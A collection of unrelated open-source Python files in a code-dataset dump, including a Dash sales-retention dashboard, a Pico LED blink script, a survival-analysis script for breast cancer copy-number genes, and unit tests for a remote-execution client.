20, \"r\": 20, \"t\": 20, \"b\": 20},\n xaxis={\"showticklabels\": False}\n)\nfig_retencao.update_yaxes(tickfont=dict(size=18, color='black'))\nfor data_index, bar in enumerate(fig_retencao.data):\n x_value = bar.x[0]\n y_value = bar.y[0]\n fig_retencao.add_annotation(\n x=x_value + 400, # Ajuste horizontal da posição do texto\n y=y_value,\n text=f\"{x_value:.2f}\", # Formatação do valor com duas casas decimais\n showarrow=False, # Não mostrar seta\n font=dict(size=18, color=\"black\", family=\"Arial, sans-serif\") # Estilo da fonte do texto\n )\nfig_retencao.update_xaxes(tickformat=\".2f\")\nfig_retencao.update_layout(showlegend=False) # Remove a legenda\nfig_retencao.update_xaxes(showgrid=False)\nfig_retencao.update_yaxes(showgrid=False)\n\n# ========= Tabelas =========== #\n\ndata_matrix = [['% de Reversão', 'Solicitações', 'Cancelados', 'Revertidos']]\npercentage_value = df_retencao[df_retencao['Nome'] == 'Pessoa1']['% de reversão'].iloc[0]\nformatted_percentage = f\"{percentage_value / 1:.2f}%\"\n\nfig_matrix.append([\n formatted_percentage,\n df_retencao[df_retencao['Nome'] == 'Pessoa1']['Solicitações'].iloc[0],\n df_retencao[df_retencao['Nome'] == 'Pessoa1']['Cancelados'].iloc[0],\n df_retencao[df_retencao['Nome'] == 'Pessoa1']['Revertidos'].iloc[0]])\n\ncolorscale = [[0, '#ab1216'],[.5, '#8a8a8a'],[1, '#e5e5e5']]\nfig_matrix = ff.create_table(data_matrix, height_constant=20, colorscale=colorscale)\nfig_matrix.layout.width=600\nfor i in range(len(fig_matrix.layout.annotations)):\n fig_matrix.layout.annotations[i].font.size = 18\n\n# ========= Layout =========== #\nlayout = dbc.Col([\n dbc.Row([\n dbc.Col([\n dbc.CardGroup([\n dbc.Card([\n html.Legend('MRR revertido Retenção', style={'font-weight': 'bold', 'color': 'black'}),\n html.H5(soma_mrr_feito_retencao1, id='p-saldo-dashboards', style={'font-weight': 'bold', 'font-size':'25px', 'color':'rgb(235, 50, 55)'})\n ], style={'padding-left': '20px', 'padding-top': '10px'}),\n dbc.Card(\n html.Div(className='fa fa-line-chart ', style=card_icon),\n color= 'black',\n style={'maxWidth': 75, 'height': 100, 'margin-left': '-10px'}\n )\n ])\n ], width=4),\n\n dbc.Col([ \n dbc.CardGroup([\n dbc.Card([\n html.Legend('Reversão do time de Retenção', style={'font-weight': 'bold', 'color': 'black'}),\n html.H5(reversao_retencao, id='p-receita-dashboards', style={'font-weight': 'bold', 'font-size':'25px', 'color':'rgb(235, 50, 55)'})\n ], style={'padding-left': '20px', 'padding-top': '10px'}),\n dbc.Card(\n html.Div(className='fa fa-line-chart ', style=card_icon),\n color= 'black',\n style={'maxWidth': 75, 'height': 100, 'margin-left': '-10px'}\n )\n ])\n ], width=4),\n \n dbc.Col([ \n dbc.CardGroup([\n dbc.Card([\n html.Legend('MRR Revertido Financeiro', style={'font-weight': 'bold', 'color': 'black'}),\n html.H5(mrr_revertido_financeiro, id='p-despesa-dashboards', style={'font-weight': 'bold', 'font-size':'25px', 'color':'rgb(235, 50, 55)'})\n ], style={'padding-left': '20px', 'padding-top': '10px'}),\n dbc.Card(\n html.Div(className='fa fa-line-chart ', style=card_icon),\n color= 'black',\n style={'maxWidth': 75, 'height': 100, 'margin-left': '-10px'}\n )\n ])\n ], width=4),\n ], style={'margin': '30px'}),\n \n dbc.Row([ \n dbc.Col([\n dbc.CardGroup([\n dbc.Card([\n html.Label(\"Período de análise\", style={\"margin-top\": \"10px\"}),\n dcc.Dropdown(\n id=\"dropdown-despesa\",\n clearable=False,\n style={\"width\": \"100%\"},\n persistence=True,\n persistence_type=\"session\",\n multi=True\n )\n ], style={'height':\"70%\", 'padding': '20px', 
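The summary-table block above appends a row via fig_matrix.append before fig_matrix exists; the row belongs on the data_matrix list that ff.create_table consumes. A minimal working version of that pattern (values illustrative):

import plotly.figure_factory as ff

data_matrix = [["% de Reversão", "Solicitações", "Cancelados", "Revertidos"]]
data_matrix.append(["85.00%", 120, 18, 102])  # rows go on the list, not the figure

colorscale = [[0, "#ab1216"], [0.5, "#8a8a8a"], [1, "#e5e5e5"]]
fig_matrix = ff.create_table(data_matrix, height_constant=20, colorscale=colorscale)
for annotation in fig_matrix.layout.annotations:
    annotation.font.size = 18
fig_matrix.show()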
'margin-left': '30px'})\n ])\n ], width=4),\n dbc.Col([\n dbc.Button(\"Pessoa1\", id='img-pessoa-1', className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa2\", id='img-pessoa-2', className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa3\", id='img-pessoa-3',className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa4\", id='img-pessoa-4',className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa5\", id='img-pessoa-5', className='teste1', n_clicks=0),\n dbc.Button(\"Pessoa6\", id='img-pessoa-6',className='teste1', n_clicks=0),\n ], className = 'teste2'),\n ]),\n dbc.Row([\n dbc.Col(\n dbc.Card(dcc.Graph(id='graph2'), style={'padding-left': '30px', 'width': '100%'}), width=6),\n dbc.Col([\n dbc.Card(dcc.Graph(id='graph3'), style={'margin-left': '50px', 'margin-top': '30px', 'width': '100%'}),\n dbc.Card(dcc.Graph(id='graph4'), style={'margin-left': '50px', 'margin-top': '30px', 'width': '100%'}),\n ], width=6),\n])\n])\n\n@app.callback(\n [Output('img-pessoa-1', 'className'),\n Output('img-pessoa-2', 'className'),\n Output('img-pessoa-3', 'className'),\n Output('img-pessoa-4', 'className'),\n Output('img-pessoa-5', 'className'),\n Output('img-pessoa-6', 'className'),\n Output('graph2', 'figure'),\n Output('graph3', 'figure'),\n Output('graph4', 'figure')], \n [Input('img-pessoa-1', 'n_clicks'),\n Input('img-pessoa-2', 'n_clicks'),\n Input('img-pessoa-3', 'n_clicks'),\n Input('img-pessoa-4', 'n_clicks'),\n Input('img-pessoa-5', 'n_clicks'),\n Input('img-pessoa-6', 'n_clicks')],\n prevent_initial_call=True\n)\n\ndef update_card(img1, img2, img3, img4, img5, img6):\n figura = go.Figure()\n figura2 = go.Figure()\n figura3 = go.Figure()\n\n changed_id = [p['prop_id'] for p in dash.callback_context.triggered][0]\n \n class_pessoa1, class_pessoa2, class_pessoa3, class_pessoa4, class_pessoa5, class_pessoa6 = \\\n 'teste1', 'teste1', 'teste1', 'teste1', 'teste1', 'teste1'\n\n if 'img-pessoa-1' in changed_id:\n figura = fig_pessoa1\n figura2 = fig_pessoa11\n figura3 = data_matrix\n class_pessoa1 = 'teste1-active'\n elif 'img-pessoa-2' in changed_id:\n figura = fig_pessoa2\n figura2 = fig_pessoa22\n figura3 = data_matrix\n class_pessoa2 = 'teste1-active'\n elif 'img-pessoa-3' in changed_id:\n figura = fig_pessoa3\n figura2 = fig_pessoa33\n figura3 = data_matrix\n class_pessoa3 = 'teste1-active'\n elif 'img-pessoa-4' in changed_id:\n figura = fig_pessoa4\n figura2 = fig_pessoa44\n figura3 = fig_pessoa444\n class_pessoa4 = 'teste1-active'\n elif 'img-pessoa-5' in changed_id:\n figura = fig_pessoa5\n figura2 = fig_pessoa55\n figura3 = fig_pessoa555\n class_pessoa5 = 'teste1-active'\n elif 'img-pessoa-6' in changed_id:\n figura = fig_pessoa6\n figura2 = fig_pessoa66\n figura3 = fig_pessoa666\n class_pessoa6 = 'teste1-active'\n\n return class_pessoa1, class_pessoa2, class_pessoa3, class_pessoa4, class_pessoa5, class_pessoa6, figura, figura2, figura3\n\n","repo_name":"BEATRIZBUFFON/Web-Scraping-eGestor","sub_path":"folder/gspread-planilha.py","file_name":"gspread-planilha.py","file_ext":"py","file_size_in_byte":17569,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19296525396","text":"from machine import Pin, Timer\n\n# Red on the tiny Pico\nrgbRed = Pin(18, Pin.OUT)\n# Green on the tiny Pico\nrgbGreen = Pin(19, Pin.OUT)\n# Blue on the tiny Pico\nrgbBlue = Pin(20, Pin.OUT)\n\n# from https://github.com/raspberrypi/pico-micropython-examples/blob/master/blink/blink.py\n\n# always Green on the (standard) Pico\nled = Pin(25, Pin.OUT)\n\ntimer = Timer()\ndef 
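The update_card callback above identifies the clicked button by inspecting dash.callback_context.triggered; that dispatch pattern in isolation looks like the following minimal two-button sketch (component ids here are hypothetical):

import dash
from dash import html
from dash.dependencies import Input, Output

app = dash.Dash(__name__)
app.layout = html.Div([
    html.Button("A", id="btn-a", n_clicks=0),
    html.Button("B", id="btn-b", n_clicks=0),
    html.Div(id="out"),
])

@app.callback(
    Output("out", "children"),
    [Input("btn-a", "n_clicks"), Input("btn-b", "n_clicks")],
    prevent_initial_call=True,
)
def on_click(a_clicks, b_clicks):
    # prop_id looks like "btn-a.n_clicks"; match on the component id.
    changed_id = [p["prop_id"] for p in dash.callback_context.triggered][0]
    return "A clicked" if "btn-a" in changed_id else "B clicked"

if __name__ == "__main__":
    app.run_server(debug=True)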
tick(timer):\n global led\n led.toggle()\n\ntimer.init(freq=1, mode=Timer.PERIODIC, callback=tick)\n","repo_name":"unPi-ro/sonar.glass","sub_path":"examples/all_pico_leds.py","file_name":"all_pico_leds.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34274079490","text":"\nfrom os import write\nfrom pymongo import MongoClient\n\ndef writeLog_exception_noEle(item):\n # testing func: write the scraping data to a txt\n # INPUT: scraping array\n with open(\"scholarship_log.txt\", \"a+\", encoding=\"utf-8\") as writer:\n writer.write(str(item) + \"\\n\")\n writer.write(\n \"==================================================================================================\\n\\n\")\n writer.close()\n\n\ndef writeLog_scrapped_data(item):\n # testing func: write the scraping data to a txt\n # INPUT: scraping array\n with open(\"test_output.txt\", \"a+\", encoding=\"utf-8\") as writer:\n for x in item:\n writer.write(str(x) + \"\\n\")\n\n writer.write(\"======================================\\n\\n\")\n writer.close()\n\n\ndef write_collegeData(item):\n with open(\"college_data.txt\", \"a+\", encoding=\"utf-8\") as writer:\n writer.write(item + \"\\n\")\n writer.close()\n\n# def write_collegeData_result(item):\n# with open(\"college_data_result.txt\", \"a+\", encoding=\"utf-8\") as writer:\n# writer.write(item + \"\\n\")\n# writer.close()\n\nclient = MongoClient(\"mongodb://localhost:27017/\")\nuni_ref = client.test.colleges\n\ndef append_college(data):\n # print(data)\n uni_ref.insert_one(data)\n\ndef college_scraped(url):\n with open(\"college_scraped_url.txt\", \"a+\", encoding=\"utf-8\") as writer:\n writer.write(url + \"\\n\")\n writer.close()\n \n\ndef read_url():\n result = \"\"\n with open(\"college_data.txt\") as reader:\n result = reader.read()\n reader.close()\n return result\n ","repo_name":"MichaelTrzaskoma/455-ScholarshipRecommendation","sub_path":"backend/scrapping/scrap_log.py","file_name":"scrap_log.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31586532773","text":"#!/usr/bin/env python3\nimport ast\nimport yaml\nimport click\n\n\nclass Analyzer(ast.NodeVisitor):\n def __init__(self):\n self.import_stmt_stats = []\n\n def visit_Import(self, node):\n for alias in node.names:\n self.import_stmt_stats.append({\n \"pkg\": None,\n \"name\": alias.name,\n \"as\": alias.asname\n })\n self.generic_visit(node)\n\n def visit_ImportFrom(self, node):\n for alias in node.names:\n self.import_stmt_stats.append({\n \"pkg\": node.module,\n \"name\": alias.name,\n \"as\": alias.asname\n })\n self.generic_visit(node)\n\n def report(self, y):\n def build_py_import_stmt(i):\n as_clause = \" as {}\".format(i['as']) if i['as'] else \"\"\n from_clause = \"from {} \".format(i['pkg']) if i['pkg'] else \"\"\n import_stmt = \"{}import {}{}\".format(from_clause, i['name'], as_clause)\n return import_stmt\n\n if y:\n print(yaml.dump(self.import_stmt_stats))\n else:\n format_out = map(build_py_import_stmt, self.import_stmt_stats)\n for o in format_out:\n print(o)\n\n\n@click.command()\n@click.argument(\n 'py_src', required=True, type=click.File('r')\n)\n@click.option(\n '-y', help=\"Output result in yaml\", is_flag=True\n)\ndef main(py_src, y):\n \"\"\"Given python source, scan all the 'import' statements from AST\"\"\"\n tree = ast.parse(py_src.read())\n\n analyzer = Analyzer()\n 
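For reference, the Analyzer defined above can be exercised on an inline source string rather than a file; a small illustrative driver (assumes the Analyzer class and the ast import from this script):

sample = "import os\nfrom collections import OrderedDict as OD\n"
demo = Analyzer()
demo.visit(ast.parse(sample))
demo.report(y=False)
# prints:
# import os
# from collections import OrderedDict as OD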
analyzer.visit(tree)\n analyzer.report(y)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"werwty/dependency-analysis-pypi","sub_path":"code/poc/import_scan/import_scan.py","file_name":"import_scan.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11548824949","text":"#june 13 2018\n#construction kaplan meier curves based on CNV genes from Liu, et al 2018\nimport pandas as pd\nfrom lifelines.statistics import logrank_test\nfrom lifelines import KaplanMeierFitter\nfrom lifelines import CoxPHFitter\nfrom lifelines.utils import median_survival_times\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom statsmodels.sandbox.stats.multicomp import multipletests as mult\n\nfrom matplotlib import rc\n#rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('font',**{'family':'Arial','size': 18}),#'serif':['Times']})\nfont = {'family':'Arial','size': 16}\n\n#consider pulling these in programmatically\n#amps = ['AKIRIN1',\n#'HEYL',\n#'PPCS',\n#'TM2D1',\n#'INADL',\n#'PVRL4',\n#'GRHL1',\n#'KLF11',\n#'PRKCI',\n#'TBL1XR1',\n#'PIK3CA',\n#'TRIO',\n#'E2F3',\n#'SOX4',\n#'PTP4A1',\n#'MYB',\n#'EGFR',\n#'AUTS2',\n#'UBE3C',\n#'DNAJB6',\n#'ANKRD46',\n#'GRHL2',\n#'TRPS1',\n#'MYC',\n#'CCNE1',\n#'ADAM15']\n#\n#dels=['GAB1',\n#'MSRA',\n#'STXBP1',\n#'PTEN',\n#'BCL9L',\n#'RILPL2',\n#'KATNAL1',\n#'RB1',\n#'ARF6']\n\nhits = pd.concat([pd.read_excel('../../CNV_screen/tier0_postthesis_40-45_v2.xlsx',\n index_col='Unnamed: 0'),\n pd.read_excel('../../CNV_screen/tier0_ambiguousdeletions_v2_thru45.xlsx',\n index_col='Unnamed: 0'),\n pd.read_excel('../../CNV_screen/tier1.5 CNV screen/tier1.5_postthesis_40-45.xlsx',\n sheetname = 'tier1.5_sindura.csv',index_col='Unnamed: 0')])\n\n#hits = pd.concat([hits1,hits2])\nhits = hits[hits['Validation result'].astype(str).str.contains('\\+')].sort_values(\n ['Chromosome','from'])\n\n##side note--pull the mutsigcv q values\nmutsig=pd.read_csv('../Somatic_mutations/MutSigCV2015.sig_genes.txt',sep='\\t',\n index_col='gene')\nmuts = mutsig[mutsig.index.isin(hits.index)]\nprint(muts[['q']].reindex(hits.index).reset_index(drop=False).drop_duplicates())\nprint(muts[['q']].reindex(hits.index).reset_index(drop=False).drop_duplicates().q.to_csv(index=False))\n\ngenes = hits.index.unique().tolist()\n\namps = hits[hits['CNV type']=='amp'].index.unique().tolist()\ndels = hits[hits['CNV type']=='del'].index.unique().tolist()\n\npan = pd.read_excel('1-s2.0-S0092867418302290-mmc1.xlsx',sheetname='TCGA-CDR')\nbrca = pan[pan.type=='BRCA'].set_index('bcr_patient_barcode')\n\n#cnv = pd.read_csv('../../running scripts/CNVruns/new_TN_CNV_run/BRCA_CNVs_foldchange_TN_filtered2.csv',\n# index_col='TCGA_ID')\ncnv = pd.read_csv('../../running scripts/CNVruns/new_TN_CNV_run/BRCA_CNVs_foldchange_all_filtered2.csv',\n index_col='TCGA_ID')\ncnv = cnv[genes]\n\nbrca = brca.merge(cnv,how='right',left_index=True,right_index=True)\n#brca.to_csv('BRCA_CNVgenes_TN_survivalendpoints_UPDATEASNEEDED.csv')\nbrca.to_csv('BRCA_CNVgenes_survivalendpoints_UPDATEASNEEDED.csv')\n\nbrca = pd.read_csv('BRCA_CNVgenes_survivalendpoints_UPDATEASNEEDED.csv',index_col=0,header=0)\n#brca = pd.read_csv('BRCA_CNVgenes_TN_survivalendpoints_UPDATEASNEEDED.csv',index_col=0,header=0)\n\namptest = pd.DataFrame(index=amps,data=[np.nan]*len(amps))\ndeltest = pd.DataFrame(index=dels,data=[np.nan]*len(dels))\nampmeds = amptest.copy()\ndelmeds = deltest.copy()\n\npoints = ['OS','PFI','DSS','DFI'] 
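The helpers defined next wrap lifelines' log-rank test and Kaplan-Meier fitter; the core comparison they perform looks like this on synthetic data (a sketch, not the study's cohort):

import numpy as np
from lifelines import KaplanMeierFitter
from lifelines.statistics import logrank_test

rng = np.random.default_rng(0)
durations = rng.exponential(1000, size=200)        # follow-up time in days
events = rng.integers(0, 2, size=200)              # 1 = event observed, 0 = censored
group = rng.integers(0, 2, size=200).astype(bool)  # e.g. CNV above vs. below cutoff

result = logrank_test(durations[group], durations[~group],
                      events[group], events[~group])
print(result.p_value)

kmf = KaplanMeierFitter()
kmf.fit(durations[group], event_observed=events[group], label="group 1")
print(kmf.median_survival_time_)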
#,'DSS','DFI'\n\n##RANDOMLY SHUFFLE FOR COMPARISON - COMMENT THIS OUT WHEN GETTING REAL RESULTS\n#for time in points:\n# np.random.shuffle(brca[time+'.time'])\n\ndef lr(row,cutoff,endpoint):\n \n gene = row.name\n \n #set endpoint to use\n endtime = endpoint+'.time'\n\n test = brca.dropna(subset=[endpoint,endtime,gene])\n\n lrtest = logrank_test(test[test[gene]>cutoff][endtime],\n test[test[gene]<=cutoff][endtime],\n test[test[gene]>cutoff][endpoint],\n test[test[gene]<=cutoff][endpoint],\n alpha=0.99)\n\n return lrtest.p_value\n\ndef med(row,cutoff,endpoint):\n gene = row.name\n \n #set endpoint to use\n endtime = endpoint+'.time'\n\n test = brca.dropna(subset=[endpoint,endtime,gene])\n\n kmf = KaplanMeierFitter()\n\n kmf.fit(test[test[gene]<=cutoff][endtime],\n event_observed=test[test[gene]<=cutoff][endpoint])\n less = kmf.median_survival_time_\n kmf.fit(test[test[gene]>cutoff][endtime],\n event_observed=test[test[gene]>cutoff][endpoint])\n greater = kmf.median_survival_time_\n return greater-less\n\ndef cox(row,cutoff,endpoint):\n gene = row.name\n \n #set endpoint to use\n endtime = endpoint+'.time'\n\n test = brca.dropna(subset=[endpoint,endtime,gene])[[endpoint,endtime,gene]]\n \n if cutoff>1:\n test[gene]=test[gene].apply(lambda x: x>cutoff).replace({True:1,False:0})\n else:\n test[gene]=test[gene].apply(lambda x: xcutoff][endtime],\n event_observed=test[test[gene]>cutoff][endpoint],label='>'+str(cutoff)[:4])\n kmf.plot(ax=ax, color = colors[1])\n\n plt.ylim([0,1])\n plt.title(endpoint+' for '+gene)\n plt.xlabel('Time (days)')\n if endpoint=='OS':\n plt.ylabel('Survival')\n else:\n plt.ylabel('Fraction event-free')\n #plt.show()\n plt.tight_layout()\n plt.savefig(gene+'_'+endpoint+'_'+tag+'.pdf')\n\n\n\ncols = [col for col in rslt.columns if 'logrank_p' in col]\nrslt[(rslt[cols]<0.1).any(axis=1)]\n\n\n#TN:\n# OS_logrank_p PFI_logrank_p DSS_logrank_p DFI_logrank_p \\\n#E2F3 0.183591 0.086201 0.258809 0.219509 \n#SOX4 0.175186 0.065615 0.208570 0.138703 \n#STXBP1 0.012682 0.127284 0.122741 0.086020 \n#PTEN 0.036200 0.231327 0.116317 0.160458\n# \n##I don't really believe these plots. It looks like an effect of small numbers. 
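The cox() helper above is truncated mid-function in this record; its evident intent, a univariate Cox fit on a gene column binarised at a cutoff, can be sketched with synthetic data as:

import pandas as pd
from lifelines import CoxPHFitter

df = pd.DataFrame({
    "OS.time": [300, 900, 1200, 2000, 150, 700, 400, 1600],
    "OS": [1, 1, 0, 0, 1, 1, 0, 1],
    "gene_high": [1, 0, 1, 0, 1, 0, 1, 0],  # 1 if copy number above the cutoff
})
cph = CoxPHFitter()
cph.fit(df, duration_col="OS.time", event_col="OS")
print(cph.hazard_ratios_["gene_high"])  # hazard ratio for the high-CNV group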
so still with the whole dataset analysis\n#kmplot('E2F3',a,'PFI',('gray','r'),'TN')\n#kmplot('SOX4',a,'PFI',('gray','r'),'TN')\n#kmplot('STXBP1',d,'OS',('b','gray'),'TN')\n#kmplot('PTEN',d,'OS',('b','gray'),'TN')\n\n# PFI_logrank_fdr DSS_logrank_fdr DFI_logrank_fdr \n#E2F3 0.864501 0.98276 0.973847 \n#SOX4 0.864501 0.98276 0.973847 \n#STXBP1 0.864501 0.98276 0.973847 \n#PTEN 0.864501 0.98276 0.973847 \n# \n# OS_HR PFI_HR DSS_HR DFI_HR \n#E2F3 0.470532 0.351289 0.419432 0.394332 \n#SOX4 0.463583 0.327940 0.382721 0.331641 \n#STXBP1 -5.381682 -2.351322 -3.174719 -3.566318 \n#PTEN -4.371333 -2.003874 -4.667613 -2.926956 \n\n# OS_logrank_p PFI_logrank_p DSS_logrank_p DFI_logrank_p \\\n#AKIRIN1 0.176707 0.005876 0.062265 0.008160 \n#HEYL 0.352724 0.023095 0.228750 0.017141 \n#PPCS 0.773287 0.011658 0.184049 0.157269 \n#GRHL1 0.091250 0.107012 0.080021 0.192757 \n#KLF11 0.102229 0.111394 0.086857 0.192499 \n#SOX4 0.664678 0.245921 0.736185 0.076216 \n#MYB 0.043401 0.131926 0.024732 0.882551 \n#ANKRD46 0.054446 0.484441 0.044372 0.147595 \n#GRHL2 0.064398 0.366083 0.048345 0.077426 \n#TRPS1 0.031825 0.237945 0.023735 0.084968 \n#MYC 0.039543 0.360481 0.019710 0.089503 \n#MSRA 0.017381 0.385540 0.008645 0.049973 \n\nkmplot('AKIRIN1',a,'PFI',('gray','r'),'all')\nkmplot('HEYL',a,'PFI',('gray','r'),'all')\nkmplot('PPCS',a,'PFI',('gray','r'),'all')\nkmplot('RBM34',a,'OS',('gray','r'),'all')\nkmplot('GRHL1',a,'OS',('gray','r'),'all')\n#skip KLF - DSS and DFI are unreliable\nkmplot('C6orf203',a,'OS',('gray','r'),'all')\nkmplot('MYB',a,'OS',('gray','r'),'all')\nkmplot('ANKRD46',a,'OS',('gray','r'),'all')\nkmplot('GRHL2',a,'OS',('gray','r'),'all')\nkmplot('TRPS1',a,'OS',('gray','r'),'all')\nkmplot('MYC',a,'OS',('gray','r'),'all')\nkmplot('MSRA',d,'OS',('b','gray'),'all')\nkmplot('SERPINB8',d,'OS',('b','gray'),'all')\n#kmplot('MSRA',a,'OS',('gray','r'),'all_amp')\n#kmplot('MSRA',a,'PFI',('gray','r'),'all_amp')\n\n# PFI_logrank_fdr DSS_logrank_fdr DFI_logrank_fdr \n#AKIRIN1 0.198187 0.302432 0.277445 \n#HEYL 0.261748 0.555536 0.291398 \n#PPCS 0.198187 0.521473 0.546143 \n#GRHL1 0.541057 0.328127 0.546143 \n#KLF11 0.541057 0.328127 0.546143 \n#SOX4 0.648719 0.834343 0.434728 \n#MYB 0.560683 0.210221 0.974558 \n#ANKRD46 0.648719 0.273955 0.546143 \n#GRHL2 0.648719 0.273955 0.434728 \n#TRPS1 0.648719 0.210221 0.434728 \n#MYC 0.648719 0.210221 0.434728 \n#MSRA 0.648719 0.210221 0.434728 \n#\n# OS_HR PFI_HR DSS_HR DFI_HR \n#AKIRIN1 1.444811 2.019048 1.865499 2.393684 \n#HEYL 1.310729 1.847518 1.563176 2.280106 \n#PPCS 1.091283 1.906732 1.596665 1.643713 \n#GRHL1 1.582633 1.572157 1.847055 1.619827 \n#KLF11 1.559040 1.563259 1.822085 1.620272 \n#SOX4 1.103948 0.740498 1.108164 0.502084 \n#MYB 1.660638 1.491670 2.006785 0.943099 \n#ANKRD46 1.401133 1.130754 1.623986 1.400625 \n#GRHL2 1.387621 1.174565 1.623142 1.519926 \n#TRPS1 1.469788 1.232945 1.746612 1.495852 \n#MYC 1.448980 1.176948 1.796522 1.496191 \n#MSRA -0.662768 -0.859999 -0.534009 -0.638937 \n\n#15 genes out of 34 were significant on some measure. but no significant fdrs\n#12 significnat on some measure for whole dataset. 10 if you exclude DSS and DFI. 
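The *_fdr columns quoted in these result tables come from multiple-testing correction (the script imports statsmodels' multipletests as mult); a minimal sketch using the modern import path:

import numpy as np
from statsmodels.stats.multitest import multipletests

p = np.array([0.005876, 0.023095, 0.011658, 0.107012, 0.131926])
reject, p_fdr, _, _ = multipletests(p, alpha=0.05, method="fdr_bh")
print(p_fdr)   # Benjamini-Hochberg adjusted p-values
print(reject)  # which tests survive at FDR 0.05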
\n###this is probably the metric I care most about.\n\n#after randomizing patient endpoints:\n#15 from whole analysis - 12 if you exclude DSS and DFI.\n#8 from TN analysis\n# skip the TN analysis, it looks lik garbage anyway\n ","repo_name":"jennifereldiaz/fly-tnbc","sub_path":"kmcurves.py","file_name":"kmcurves.py","file_ext":"py","file_size_in_byte":12236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29958528630","text":"\nimport os\nimport sremote.tools as remote\nfrom sremote.api import RemoteClient\n\nimport unittest\n\n\nclass TestRemoteClient(unittest.TestCase):\n \"\"\"Abstract class to define unittests for specific implementations\"\"\"\n \n \n def setUp(self):\n self._connector = self.create_connector()\n self._client=RemoteClient(self._connector)\n \n def create_connector(self):\n return None\n \n def test_do_remote_call(self):\n self._configure_remote_environment()\n self._client.register_remote_env_path(\"/mypath\")\n response, stdout= self._client.do_remote_call(module_name=\"os\",\n method_name=\"getenv\", \n args=[\"PATH\"])\n \n self.assertIn(\"/mypath\", response)\n \n self._client.register_remote_env_variable(\"MYVAR\", \"VALUE1\")\n response, stdout= self._client.do_remote_call(module_name=\"os\",\n method_name=\"getenv\", \n args=[\"MYVAR\"])\n \n self.assertEqual(\"VALUE1\", response)\n \n self._client.register_remote_env_variable(\"PATH\", \"VALUE1\", True)\n response, stdout= self._client.do_remote_call(module_name=\"os\",\n method_name=\"getenv\", \n args=[\"PATH\"])\n \n self.assertNotEqual(\"VALUE1\", response)\n \n with self.assertRaises(remote.ExceptionRemoteExecError):\n response, stdout= self._client.do_remote_call(\n module_name=\"kkk\",\n method_name=\"getenv\",\n args=[\"PATH\"])\n \n with self.assertRaises(remote.ExceptionRemoteExecError):\n response, stdout= self._client.do_remote_call(\n module_name=\"os\",\n method_name=\"kkk\",\n args=[\"PATH\"])\n \n \n def test_do_install_git_module(self):\n self._configure_remote_environment()\n self.assertTrue(self._client.do_install_git_module(\n \"https://bitbucket.org/berkeleylab/qdo.git\",\n \"remote\", keep_after=\"mydir\"))\n self._client.register_remote_module(\"qdo\")\n response, stdout= self._client.do_remote_call(module_name=\"qdo.remote\",\n method_name=\"get_version\")\n self.assertIn(\"0.\", response)\n \n self.assertTrue(self._connector.retrieve_file(\n \"/tmp/sremote_test/tmp/mydir/README.md\", \n \"/tmp/README.md\"))\n \n def test_register_remote_module_negative(self):\n #- Positive is tested in test_do_install_git_module\n self._configure_remote_environment()\n self._client.register_remote_module(\"kkk\")\n with self.assertRaises(remote.ExceptionRemoteModulesError):\n response, stdout= self._client.do_remote_call(\n module_name=\"os\",\n method_name=\"getenv\",\n args=[\"PATH\"])\n \n def test_get_resource_route(self):\n route=self._client.get_resource_route(\"interpreter.sh\")\n self.assertTrue(os.path.isfile(route))\n \n def _configure_remote_environment(self):\n self._connector.set_sremote_dir(\"/tmp/sremote_test\")\n self._connector.set_tmp_dir(\"/tmp/sremote_test\") \n self.assertTrue(self._client.do_bootstrap_install())","repo_name":"gonzalorodrigo/sremote","sub_path":"test/test_remote_client.py","file_name":"test_remote_client.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"10353278764","text":"import graphene\nfrom 
django.db.models.query import QuerySet\nfrom django_measurement.models import MeasurementField\nfrom django_prices.models import MoneyField, TaxedMoneyField\nfrom graphene_django.converter import convert_django_field\nfrom graphene_django.fields import DjangoConnectionField\n\nfrom graphene.relay import PageInfo\nfrom graphql_relay.connection.arrayconnection import connection_from_list_slice\n\nfrom .types.common import Weight\nfrom .types.money import Money, TaxedMoney\n\n\n@convert_django_field.register(TaxedMoneyField)\ndef convert_field_taxed_money(field, registry=None):\n return graphene.Field(TaxedMoney)\n\n\n@convert_django_field.register(MoneyField)\ndef convert_field_money(field, registry=None):\n return graphene.Field(Money)\n\n\n@convert_django_field.register(MeasurementField)\ndef convert_field_measurements(field, registry=None):\n return graphene.Field(Weight)\n\n\nclass PrefetchingConnectionField(DjangoConnectionField):\n\n @classmethod\n def resolve_connection(cls, connection, default_manager, args, iterable):\n if iterable is None:\n iterable = default_manager\n\n if isinstance(iterable, QuerySet):\n _len = iterable.count()\n else:\n _len = len(iterable)\n\n connection = connection_from_list_slice(\n iterable,\n args,\n slice_start=0,\n list_length=_len,\n list_slice_length=_len,\n connection_type=connection,\n edge_type=connection.Edge,\n pageinfo_type=PageInfo,\n )\n connection.iterable = iterable\n connection.length = _len\n return connection\n","repo_name":"IvanVrecicDev/Python","sub_path":"saleor-master/saleor/graphql/core/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22200816178","text":"\n\nclass Pizza():\n \"\"\"docstring for Pizza.\"\"\"\n\n def __init__(self, index, ingredients=[], lenn=-1):\n self.idx = index\n if lenn == -1:\n self.num_ingr = len(ingredients)\n else:\n self.num_ingr = lenn\n self.ingr = ingredients\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.idx}, {self.ingr})\"\n\nclass Team():\n \"\"\"docstring for 